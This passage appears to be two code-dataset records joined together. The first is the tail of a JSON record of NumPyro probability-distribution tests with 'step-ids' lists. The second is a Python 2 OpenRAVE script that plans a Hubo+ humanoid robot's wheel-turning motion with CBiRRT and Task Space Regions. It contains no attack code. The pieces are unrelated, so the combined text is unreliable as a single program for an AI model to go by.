np.exp(np.random.normal())).expand(shape)\n actual = kl_divergence(\n dist.Independent(p, len(event_shape)), dist.Independent(q, len(event_shape))\n )\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected](\"shape\", [(), (4,), (2, 3)], ids=str)\[email protected](\n \"p_dist, q_dist\",\n [\n (dist.Beta, dist.Beta),\n (dist.Gamma, dist.Gamma),\n (dist.Kumaraswamy, dist.Beta),\n (dist.Normal, dist.Normal),\n 
(dist.Weibull, dist.Gamma),\n ],\n)\ndef test_kl_univariate(shape, p_dist, q_dist):\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f\"Missing pattern for param {k}.\")\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean((p.log_prob(x) - q.log_prob(x)), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected](\"shape\", [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10_000,)).copy()\n expected = jnp.mean((p.log_prob(x) - q.log_prob(x)), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n # test that vmapped binomial with p = 0 does not have an infinite loop\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\ndef _get_vmappable_dist_init_params(jax_dist):\n if jax_dist.__name__ == (\"_TruncatedCauchy\"):\n return [2, 3]\n elif jax_dist.__name__ == (\"_TruncatedNormal\"):\n return [2, 3]\n elif issubclass(jax_dist, dist.Distribution):\n init_parameters = list(inspect.signature(jax_dist.__init__).parameters.keys())[\n 1:\n ]\n vmap_over_parameters = list(\n inspect.signature(vmap_over.dispatch(jax_dist)).parameters.keys()\n )[1:]\n return list(\n [\n i\n for i, name in enumerate(init_parameters)\n if name in vmap_over_parameters\n ]\n )\n else:\n raise ValueError\n\n\ndef _allclose_or_equal(a1, a2):\n if isinstance(a1, np.ndarray):\n return np.allclose(a2, a1)\n elif isinstance(a1, jnp.ndarray):\n return jnp.allclose(a2, a1)\n elif isinstance(a1, csr_matrix):\n return np.allclose(a2.todense(), a1.todense())\n else:\n return a2 == a1 or a2 is a1\n\n\ndef _tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[: len(params)]\n\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n\n d = make_jax_dist(*params)\n\n if isinstance(d, _SparseCAR) and d.is_sparse:\n # In this case, since csr arrays are not jittable,\n # _SparseCAR has a csr_matrix as part of its pytree\n # definition (not as a pytree leaf). 
This causes pytree\n # operations like tree_map to fail, since these functions\n # compare the pytree def of each of the arguments using ==\n # which is ambiguous for array-like objects.\n return\n\n in_out_axes_cases = [\n # vmap over all args\n (\n tuple(0 if i in vmappable_param_idxs else None for i in range(len(params))),\n 0,\n ),\n # vmap over a single arg, out over all attributes of a distribution\n *(\n ([0 if i == idx else None for i in range(len(params))], 0)\n for idx in vmappable_param_idxs\n if params[idx] is not None\n ),\n # vmap over a single arg, out over the associated attribute of the distribution\n *(\n (\n [0 if i == idx else None for i in range(len(params))],\n vmap_over(d, **{param_names[idx]: 0}),\n )\n for idx in vmappable_param_idxs\n if params[idx] is not None\n ),\n # vmap over a single arg, axis=1, (out single attribute, axis=1)\n *(\n (\n [1 if i == idx else None for i in range(len(params))],\n vmap_over(d, **{param_names[idx]: 1}),\n )\n for idx in vmappable_param_idxs\n if isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).ndim > 0\n # skip this distribution because _GeneralMixture.__init__ turns\n # 1d inputs into 0d attributes, thus breaks the expectations of\n # the vmapping test case where in_axes=1, only done for rank>=1 tensors.\n and jax_dist is not _GeneralMixture\n ),\n ]\n\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [\n jax.tree_map(lambda x: jnp.expand_dims(x, ax), arg)\n if isinstance(ax, int)\n else arg\n for arg, ax in zip(params, in_axes)\n ]\n # Recreate the jax_dist to avoid side effects coming from `d.sample`\n # triggering lazy_property computations, which, in a few cases, break\n # vmap_over's expectations regarding existing attributes to be vmapped.\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes)(\n *batched_params\n )\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d\n )\n assert eq == jnp.array([True])\n\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10).sample(\n key\n )\n\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-6)\n\n\ndef test_normal_log_cdf():\n # test if log_cdf method agrees with jax.scipy.stats.norm.logcdf\n # and if exp(log_cdf) agrees with cdf\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-6)\n\n\[email protected](\n \"value\",\n [\n -15.0,\n jnp.array([[-15.0], [-10.0], [-5.0]]),\n jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]]),\n ],\n)\ndef test_truncated_normal_log_prob_in_tail(value):\n # define set of distributions truncated in tail of distribution\n loc = 1.35\n scale = jnp.geomspace(0.01, 1, 10)\n low, high = (-20, -1.0)\n a, b = (low - loc) / scale, (high - loc) / scale # rescale for jax input\n\n 
numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high).log_prob(\n value\n )\n jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)\n assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)\n\n\ndef test_sample_truncated_normal_in_tail():\n # test, if samples from distributions truncated in\n # tail of distribution returns any inf's\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10_000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
"step-ids": [
97,
100,
123,
125,
137
]
}
|
[
97,
100,
123,
125,
137
] |
#!/usr/bin/env python
# Ben Suay, RAIL
# May 2013
# Worcester Polytechnic Institute
#
# http://openrave.org/docs/latest_stable/command_line_tools/
# openrave-robot.py /your/path/to/your.robot.xml --info=joints
# On that page you can find more examples on how to use openrave-robot.py.
from openravepy import *
import sys
if not __openravepy_build_doc__:
from openravepy import *
from numpy import *
import numpy
import time
from rodrigues import *
from TransformMatrix import *
from str2num import *
from TSR import *
from math import *
from copy import *
import os # for file operations
from RaveCBiRRT import *
from base_wheel_turning import *
class HuboPlusWheelTurning( BaseWheelTurning ):
def __init__(self,
HuboModelPath = '../../openHubo/huboplus/rlhuboplus.robot.xml',
WheelModelPath = '../../../drc_common/models/driving_wheel.robot.xml' ):
BaseWheelTurning.__init__( self, HuboModelPath, WheelModelPath )
# Set those variables to show or hide the interface
# Do it using the member functions
self.StopAtKeyStrokes = False
self.ShowUserInterface = False
self.ViewerStarted = False
# Right Hand Joints
# Open - Closed Values
self.rhanddofs = range(27,42)
self.rhandclosevals = [0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0, 0, 1.2]
self.rhandopenvals = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08]
# Left Hand Joints
self.lhanddofs = range(42,57)
self.lhandclosevals = [0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0, 0, 1.2]
self.lhandopenvals = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08]
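        # Each list holds 15 values: knuckles 2, 3 and 1 of the index, middle,
        # ring and pinky fingers, followed by the thumb, matching the finger
        # joint ordering shown (commented out) in SetRobotConfiguration below.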
def SetRobotConfiguration(self,jointValues):
print "SetRobotConfiguration"
values = []
values.append( jointValues['HPY'] ) # 0
values.append( jointValues['RHY'] ) # 1
values.append( jointValues['LHY'] ) # 2
values.append( jointValues['RHR'] ) # 3
        values.append( jointValues['RHP'] ) # 4
values.append( jointValues['LHR'] ) # 5
values.append( jointValues['LHP'] ) # 6
values.append( jointValues['RKP'] ) # 7
values.append( jointValues['LKP'] ) # 8
values.append( jointValues['RAP'] ) # 9
values.append( jointValues['LAP'] ) # 10
values.append( jointValues['RAR'] ) # 11
values.append( jointValues['LAR'] ) # 12
values.append( jointValues['RSP'] ) # 13
values.append( jointValues['LSP'] ) # 14
values.append( jointValues['RSR'] ) # 15
values.append( jointValues['LSR'] ) # 16
values.append( jointValues['RSY'] ) # 17
values.append( jointValues['LSY'] ) # 18
values.append( jointValues['REP'] ) # 19
values.append( jointValues['LEP'] ) # 20
values.append( jointValues['RWY'] ) # 21
values.append( jointValues['LWY'] ) # 22
values.append( jointValues['RWP'] ) # 23
values.append( jointValues['LWP'] ) # 24
values.append( jointValues['HNR'] ) # 25
values.append( jointValues['HNP'] ) # 26
for i in range(27,57):
values.append(0)
# values.append( jointValues['rightIndexKnuckle2'] ) # 27
# values.append( jointValues['rightIndexKnuckle3'] ) # 28
# values.append( jointValues['rightIndexKnuckle1'] ) # 29
# values.append( jointValues['rightMiddleKnuckle2'] ) # 30
# values.append( jointValues['rightMiddleKnuckle3'] ) # 31
# values.append( jointValues['rightMiddleKnuckle1'] ) # 32
# values.append( jointValues['rightRingKnuckle2'] ) # 33
# values.append( jointValues['rightRingKnuckle3'] ) # 34
# values.append( jointValues['rightRingKnuckle1'] ) # 35
# values.append( jointValues['rightPinkyKnuckle2'] ) # 36
# values.append( jointValues['rightPinkyKnuckle3'] ) # 37
# values.append( jointValues['rightPinkyKnuckle1'] ) # 38
# values.append( jointValues['rightThumbKnuckle2'] ) # 39
# values.append( jointValues['rightThumbKnuckle3'] ) # 40
# values.append( jointValues['rightThumbKnuckle1'] ) # 41
# values.append( jointValues['leftIndexKnuckle2'] ) # 42
# values.append( jointValues['leftIndexKnuckle3'] ) # 43
# values.append( jointValues['leftIndexKnuckle1'] ) # 44
# values.append( jointValues['leftMiddleKnuckle2'] ) # 45
# values.append( jointValues['leftMiddleKnuckle3'] ) # 46
# values.append( jointValues['leftMiddleKnuckle1'] ) # 47
# values.append( jointValues['leftRingKnuckle2'] ) # 48
# values.append( jointValues['leftRingKnuckle3'] ) # 49
# values.append( jointValues['leftRingKnuckle1'] ) # 50
# values.append( jointValues['leftPinkyKnuckle2'] ) # 51
# values.append( jointValues['leftPinkyKnuckle3'] ) # 52
# values.append( jointValues['leftPinkyKnuckle1'] ) # 53
# values.append( jointValues['leftThumbKnuckle2'] ) # 54
# values.append( jointValues['leftThumbKnuckle3'] ) # 55
# values.append( jointValues['leftThumbKnuckle1'] ) # 56
self.robotid.SetDOFValues( values )
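
    # A minimal usage sketch for SetRobotConfiguration (not exercised in this
    # file; the dict keys are the joint names read above and the zero values
    # are only illustrative):
    #
    #   planner = HuboPlusWheelTurning()
    #   planner.SetRobotConfiguration({'HPY': 0.0, 'RHY': 0.0, 'LHY': 0.0,
    #                                  'RHR': 0.0, ...})
    #
    # Every joint name read above must be present in the dict, otherwise a
    # KeyError is raised.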
def Run(self):
self.RemoveFiles()
# This is a list of handles of the objects that are
# drawn on the screen in OpenRAVE Qt-Viewer.
# Keep appending to the end, and pop() if you want to delete.
handles = []
        normalsmoothingitrs = 150
        fastsmoothingitrs = 20
self.StartViewerAndSetWheelPos( handles )
# Wheel Joint Index
crankjointind = 0
# Set the wheel joints back to 0 for replanning
self.crankid.SetDOFValues([0],[crankjointind])
self.crankid.GetController().Reset(0)
manips = self.robotid.GetManipulators()
crankmanip = self.crankid.GetManipulators()
try:
cbirrtHubo = RaveCBiRRT(self.env,'rlhuboplus')
cbirrtWheel = RaveCBiRRT(self.env,'crank')
except openrave_exception, e:
print e
return []
# Keep Active Joint Indices
# Note that 0 is the driving wheel
#activedofs = [0]
activedofs = []
for m in manips:
# print m.GetArmIndices()
activedofs.extend(m.GetArmIndices())
# Sort Active Joint Indices
activedofs.sort()
#print activedofs
# Set Elbows and Thumbs Joint Values
self.robotid.SetDOFValues([-0.95,-0.95,1,1],[19,20,41,56])
self.robotid.SetActiveDOFs(activedofs)
# Current configuration of the robot is its initial configuration
initconfig = self.robotid.GetActiveDOFValues()
print "robot init config : "
print initconfig
# List of Robot Links
links = self.robotid.GetLinks()
# List of Wheel (Crank Links)
cranklinks = self.crankid.GetLinks()
# End Effector Transforms
Tee = []
for i in range(len(manips)):
# Returns End Effector Transform in World Coordinates
Tlink = manips[i].GetEndEffectorTransform()
Tee.append(Tlink)
# Get Transformation Matrix for the Wheel
# Note that crank's links are not rotated
# If you want use the wheel's end effector's transformation
# matrix (which is 23 degrees tilted) then see
# CTee matrix below.
#
# crank has two links:
# 0) pole - the blue cylinder in the model, and,
# 1) crank - the driving wheel itself.
jointtm = cranklinks[0].GetTransform()
# handles.append(misc.DrawAxes(env,matrix(jointtm),1))
# We can also get the transformation matrix
# with the following command as a string
jointtm_str = cbirrtHubo.solve('GetJointTransform name crank jointind '+str(crankjointind))
# And then we can convert the string to a 1x12 array
jointtm_str = jointtm_str.replace(" ",",")
jointtm_num = eval('['+jointtm_str+']')
# In this script we will use jointtm.
# jointtm_str and jointtm_num are given as example.
# Crank Transform End Effector in World Coordinates
# This is the transformation matrix of the end effector
# named "dummy" in the xml file.
        # Note that dummy is tilted 23 degrees around its X-Axis
CTee = crankmanip[0].GetEndEffectorTransform()
tilt_angle_deg = acos(dot(linalg.inv(CTee),jointtm)[1,1])*180/pi
tilt_angle_rad = acos(dot(linalg.inv(CTee),jointtm)[1,1])
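        # Why the [1,1] entry: a pure rotation about the X-axis by theta has
        # the rotation matrix
        #   [[1, 0,           0          ],
        #    [0, cos(theta), -sin(theta) ],
        #    [0, sin(theta),  cos(theta) ]]
        # so acos of element [1,1] of inv(CTee)*jointtm recovers the ~23 degree
        # tilt between the "dummy" end effector and the crank joint frame.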
# Center of Gravity Target
cogtarg = [-0.05, 0.085, 0]
#if self.ShowUserInterface :
#cogtm = MakeTransform(rodrigues([0,0,0]),transpose(matrix(cogtarg)))
#handles.append(misc.DrawAxes(self.env,cogtm,1))
# polyscale: changes the scale of the support polygon
# polytrans: shifts the support polygon around
footlinknames = ' Body_RAR Body_LAR polyscale 0.5 0.5 0 polytrans -0.015 0 0 '
#footlinknames = ' Body_RAR Body_LAR polyscale 0.7 0.5 0 polytrans -0.015 0 0 '
#footlinknames = ' Body_RAR Body_LAR polyscale 1.0 1.0 0 polytrans 0 0 0 '
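        # With the values used above, the support polygon is scaled to 50% in
        # x and y and shifted by -0.015 m in x; the commented alternatives
        # relax or remove that shrinking.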
        # Hand orientation helper: a rotation of -pi/2 about the Y-axis
        # (defined here but not referenced again below)
        handrot = rodrigues([0,-pi/2,0])
        # Translation offset from the wheel center for the hands
        transoffset = [0, 0.15, 0]
# Figure out where to put the left hand on the wheel
temp = dot(CTee, MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0]))))
temp = dot(temp, MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0]))))
# Left Hand Pose in World Coordinates
T0_LH1 = dot(temp, MakeTransform(rodrigues([0,0,0]),transpose(matrix([0,0.15,0]))))
# Uncomment if you want to see where T0_LH1 is
# handles.append(misc.DrawAxes(env,matrix(T0_LH1),1))
# Figure out where to put the right hand on the wheel
temp = dot(CTee, MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0]))))
temp = dot(temp, MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0]))))
# Right Hand Pose in World Coordinates
T0_RH1 = dot(temp, MakeTransform(rodrigues([0,0,0]),transpose(matrix([0,-0.15,0]))))
# Uncomment if you want to see where T0_RH1 is
# handles.append(misc.DrawAxes(env,matrix(T0_RH1),1))
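        # Both grasp poses are built with the same composition:
        #   T0_H = CTee * Rx(-pi/2) * Rz(-pi/2) * Trans(0, +/-0.15, 0)
        # i.e. re-orient the wheel's "dummy" end-effector frame and then slide
        # 0.15 m along its new Y-axis: +0.15 for the left hand, -0.15 for the
        # right hand, putting the hands on opposite sides of the wheel.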
# Define Task Space Region strings
# Left Hand
TSRString1 = SerializeTSR(0,'NULL',T0_LH1,eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))
# Right Hand
TSRString2 = SerializeTSR(1,'NULL',T0_RH1,eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))
# Left Foot
TSRString3 = SerializeTSR(2,'NULL',Tee[2],eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))
# Head
# Grasp transform in Head coordinates
Tw0_eH = eye(4)
# How much freedom do we want to give to the Head
# [x,x,y,y,z,z,R,R,P,P,Y,Y]
Bw0H = matrix([0,0,-0.1,0.1,-0.1,0.01,0,0,0,0,0,0])
TSRString4 = SerializeTSR(4,'NULL',Tee[4],Tw0_eH,Bw0H)
# We defined Task Space Regions. Now let's concatenate them.
TSRChainStringGrasping = SerializeTSRChain(0,1,0,1,TSRString1,'NULL',[])+' '+SerializeTSRChain(0,1,0,1,TSRString2,'NULL',[])+' '+SerializeTSRChain(0,1,1,1,TSRString3,'NULL',[])+' '+SerializeTSRChain(0,1,1,1,TSRString4,'NULL',[])
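        # A reading of the SerializeTSRChain flags, assuming the standard comps
        # TSR.py signature (sample-start, sample-goal, constrain-to-chain,
        # num-TSRs, TSR string, mimic body, mimic joints): the two hand chains
        # (0,1,0,1) are used only to sample the goal, while the foot and head
        # chains (0,1,1,1) are also enforced as constraints along the path.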
if( self.StopAtKeyStrokes ):
print "Press Enter to plan initconfig --> startik"
sys.stdin.readline()
# Get a trajectory from initial configuration to grasp configuration
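        # Note that no explicit joint goal is given here: 'psample 0.2' has the
        # planner sample goal configurations from the TSR chains above, whereas
        # the later turning and return plans pass explicit 'jointgoals'.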
with self.robotid:
try:
answer = cbirrtHubo.solve('RunCBiRRT psample 0.2 supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' '+TSRChainStringGrasping)
print "RunCBiRRT answer: ",str(answer)
except openrave_exception, e:
print "Cannot send command RunCBiRRT: "
print e
return []
try:
os.rename("cmovetraj.txt","movetraj0.txt")
except OSError, e:
# No file cmovetraj
print e
return []
# The following is the same as commented out try-except section
traj = RaveCreateTrajectory(self.env,'').deserialize(open('movetraj0.txt','r').read())
self.robotid.GetController().SetPath(traj)
self.robotid.WaitForController(0)
self.robotid.GetController().Reset(0)
# Reset(0) releases the controller, otherwise after calling
# SetPath the robot controller actively holds the trajectory's final joint values
# Instead of 4 lines above, we could use the following block
# to play the trajectory
#
# try:
# answer= cbirrtHubo.solve('traj movetraj0.txt');
# robotid.WaitForController(0)
# sys.stdin.readline()
# # debug
# print "traj call answer: ",str(answer)
# except openrave_exception, e:
# print e
# Get the current configuration of the robot
# and assign it to startik (start of the wheel
# rotation path).
startik = self.robotid.GetActiveDOFValues()
        # The left hand's manipulator index is lower than the right hand's,
        # so it is evaluated first by the CBiRRT module. That's why we need
        # to define the right hand's transform relative to the wheel
        # (ask Dmitry Berenson about this for more information).
temp1 = MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0])))
temp2 = MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0])))
# Rotate the wheel's transform to a suitable pose
# for the Left Hand
# T0_w0L stands for:
# left hand's transform on wheel in world coordinates
T0_w0L = dot(dot(CTee,temp1),temp2)
# This is what's happening:
#
# Tw0L_0 = linalg.inv(T0_w0L)
# Tw0L_LH1 = Tw0L_0*T0_LH1
#
# Left hand's transform in wheel's coordinates
Tw0L_LH1 = dot(linalg.inv(T0_w0L),T0_LH1)
# Transform of the left hand's end effector in wheel's coords.
# Required by CBiRRT
Tw0_eL = Tw0L_LH1
# How much freedom do we want to give to the left hand
Bw0L = matrix([0,0,0,0,0,0,0,pi,0,0,0,0])
# Right Hand's transforms:
T0_crankcrank = self.crankid.GetManipulators()[0].GetTransform()
T0_w0R = MakeTransform(rodrigues([tilt_angle_rad,0,0]),transpose(matrix([0,0,0])))
# End effector transform in wheel coordinates
Tw0_eR = dot(linalg.inv(T0_crankcrank),T0_RH1)
#handles.append(misc.DrawAxes(env,matrix(Tw0_eR),1))
# How much freedom? (note: in frame of crank)
Bw0R = matrix([0,0,0,0,0,0,0,0,0,0,0,0])
# Head's transforms:
T0_w0H = Tee[4]
        Tw0_eH = eye(4)
Bw0H = matrix([-0.05,0.05,-0.1,0.1,-100,100,-pi,pi,-pi,pi,-pi,pi])
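        # These head bounds are deliberately loose: a few centimetres in x/y,
        # effectively unbounded z (+/-100) and full +/-pi rotations, so the
        # head is left essentially unconstrained while turning.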
# Define Task Space Regions
# Left Hand
TSRString1 = SerializeTSR(0,'NULL',T0_w0L,Tw0_eL,Bw0L)
# Right Hand
TSRString2 = SerializeTSR(1,'crank crank',T0_w0R,Tw0_eR,Bw0R)
# Left Foot
TSRString3 = SerializeTSR(2,'NULL',Tee[2],eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))
# Head
TSRString4 = SerializeTSR(4,'NULL',T0_w0H,Tw0_eH,Bw0H)
TSRChainStringFootOnly = SerializeTSRChain(0,0,1,1,TSRString3,'NULL',[])
TSRChainStringFootandHead = TSRChainStringFootOnly+' '+SerializeTSRChain(0,0,1,1,TSRString4,'NULL',[])
TSRChainStringTurning = SerializeTSRChain(0,0,1,1,TSRString1,'crank',matrix([crankjointind]))+' '+SerializeTSRChain(0,0,1,1,TSRString2,'NULL',[])+' '+TSRChainStringFootandHead
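        # For the turning phase every chain uses the flags (0,0,1,1), i.e. it
        # acts as a constraint over the whole path rather than a goal sampler
        # (under the same signature assumption as above). The left-hand chain
        # additionally names 'crank' and its joint index as a mimic body, which
        # is what couples the hand motion to the wheel rotation.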
# Calculate hand transforms after rotating the wheel (they will help us find the goalik):
# How much do we want to rotate the wheel?
crank_rot = pi/6.5
# Which joint do we want the CBiRRT to mimic the TSR for?
TSRChainMimicDOF = 1
# Create the transform for the wheel that we would like to reach to
Tcrank_rot = MakeTransform(rodrigues([crank_rot,0,0]),transpose(matrix([0,0,0])))
        # Rotation of crank_rot about the Z-axis; used below to rotate the
        # right hand within the crank's own frame
temp = MakeTransform(rodrigues([0,0,crank_rot]),transpose(matrix([0,0,0])))
# Rotate the left hand's transform on the wheel in world transform "crank_rot" radians around it's Z-Axis
T0_cranknew = dot(T0_w0L,Tcrank_rot)
# Where will the left hand go after turning the wheel?
# This is what's happening:
#
# Tcranknew_LH2 = dot(Tw0L_0,T0_LH1) --> Left hand in wheel's coordinate
# T0_LH2 = dot(T0_cranknew,Tcranknew_LH2) --> Left hand rotated around wheel's origin
T0_LH2 = dot(T0_cranknew,dot(linalg.inv(T0_w0L),T0_LH1))
# Uncomment to see T0_LH2
# handles.append(misc.DrawAxes(env,matrix(T0_LH2),1))
# Where will the right hand go after turning the wheel?
T0_RH2 = dot(T0_crankcrank,dot(temp,dot(linalg.inv(T0_crankcrank),T0_RH1)))
# Uncomment to see T0_RH2
# handles.append(misc.DrawAxes(env,matrix(T0_RH2),1))
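        # Both hand updates follow the same conjugation pattern
        #   T0_H2 = T0_F * R(crank_rot) * inv(T0_F) * T0_H1
        # with F = T0_w0L (rotated about its X-axis) for the left hand and
        # F = T0_crankcrank (rotated about its Z-axis) for the right hand.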
arg1 = str(cogtarg).strip("[]").replace(', ',' ')
arg2 = trans_to_str(T0_LH2)
arg3 = trans_to_str(T0_RH2)
arg4 = trans_to_str(Tee[2])
# print arg1
# print arg2
# print arg3
# print arg4
if( self.StopAtKeyStrokes ):
print "Press Enter to find a goalIK"
sys.stdin.readline()
self.crankid.SetDOFValues([crank_rot],[crankjointind])
goalik = cbirrtHubo.solve('DoGeneralIK exec supportlinks 2 '+footlinknames+' movecog '+arg1+' nummanips 3 maniptm 0 '+arg2+' maniptm 1 '+arg3+' maniptm 2 '+arg4)
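        # The DoGeneralIK request assembled above keeps the center of gravity
        # over cogtarg, uses both feet as support links and solves for three
        # manipulator poses: maniptm 0 is the left hand at T0_LH2, maniptm 1
        # the right hand at T0_RH2, and maniptm 2 the left foot held at Tee[2].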
# print "goalIK"
# print goalik
self.robotid.SetActiveDOFValues(str2num(goalik))
self.crankid.SetDOFValues([crank_rot],[crankjointind])
if( self.StopAtKeyStrokes ):
print "Press Enter to go to startik"
sys.stdin.readline()
        # Prepare the goal joint vector (goalik plus one value per mimicked
        # crank DOF) for planning from startik to goalik
goaljoints = deepcopy(goalik)
for i in range(TSRChainMimicDOF):
goaljoints += ' 0'
goaljoints = str2num(goaljoints)
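        # One extra goal value (' 0') is appended per mimicked DOF, here the
        # single crank joint, so that the length of goaljoints matches the
        # joint vector CBiRRT plans over when a mimic body is attached.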
self.robotid.SetActiveDOFValues(startik)
time.sleep(0.5)
self.robotid.SetDOFValues(self.rhandclosevals,self.rhanddofs)
self.robotid.SetDOFValues(self.lhandclosevals,self.lhanddofs)
# Close hands to start "turning" the wheel
self.crankid.SetDOFValues([0],[crankjointind])
time.sleep(0.5)
if( self.StopAtKeyStrokes ):
print "Press Enter to plan startik --> goalik (DMITRY!!!)"
sys.stdin.readline()
print self.robotid.GetActiveDOFValues()
print TSRChainStringTurning
try:
answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(fastsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringTurning)
print "RunCBiRRT answer: ",str(answer)
except openrave_exception, e:
print "Cannot send command RunCBiRRT: "
print e
return []
try:
os.rename("cmovetraj.txt","movetraj1.txt")
except OSError, e:
# No file cmovetraj
print e
return []
        # The commented-out block below (deserialize + SetPath) is equivalent
        # to the 'traj' calls in the try block that follows
# traj = RaveCreateTrajectory(env,'').deserialize(open('movetraj1.txt','r').read())
# robotid.GetController().SetPath(traj)
# crankid.GetController().SetPath(traj)
# robotid.WaitForController(0)
# crankid.WaitForController(0)
# robotid.GetController().Reset(0)
# crankid.GetController().Reset(0)
try:
answer= cbirrtHubo.solve('traj movetraj1.txt');
answer= cbirrtWheel.solve('traj movetraj1.txt');
self.robotid.WaitForController(0)
# debug
print "traj call answer: ",str(answer)
except openrave_exception, e:
print e
return []
self.robotid.GetController().Reset(0)
self.robotid.SetDOFValues(self.rhandopenvals,self.rhanddofs)
self.robotid.SetDOFValues(self.lhandopenvals,self.lhanddofs)
self.robotid.SetActiveDOFValues(str2num(goalik))
time.sleep(2)
if( self.StopAtKeyStrokes ):
print "Press Enter to plan goalik --> startik "
sys.stdin.readline()
goaljoints = startik
print self.robotid.GetActiveDOFValues()
print TSRChainStringFootandHead
try:
answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringFootandHead)
print "RunCBiRRT answer: ",str(answer)
except openrave_exception, e:
print "Cannot send command RunCBiRRT: "
print e
return []
try:
os.rename("cmovetraj.txt","movetraj2.txt")
except OSError, e:
# No file cmovetraj
print e
return []
try:
answer= cbirrtHubo.solve('traj movetraj2.txt');
self.robotid.WaitForController(0)
# debug
print "traj call answer: ",str(answer)
except openrave_exception, e:
print e
return []
self.robotid.GetController().Reset(0)
#self.robotid.SetDOFValues(rhandclosevals,rhanddofs)
#self.robotid.SetDOFValues(lhandclosevals,lhanddofs)
self.robotid.SetActiveDOFValues(startik)
time.sleep(1)
if( self.StopAtKeyStrokes ):
print "Press Enter to plan startik --> initconfig "
sys.stdin.readline()
goaljoints = initconfig
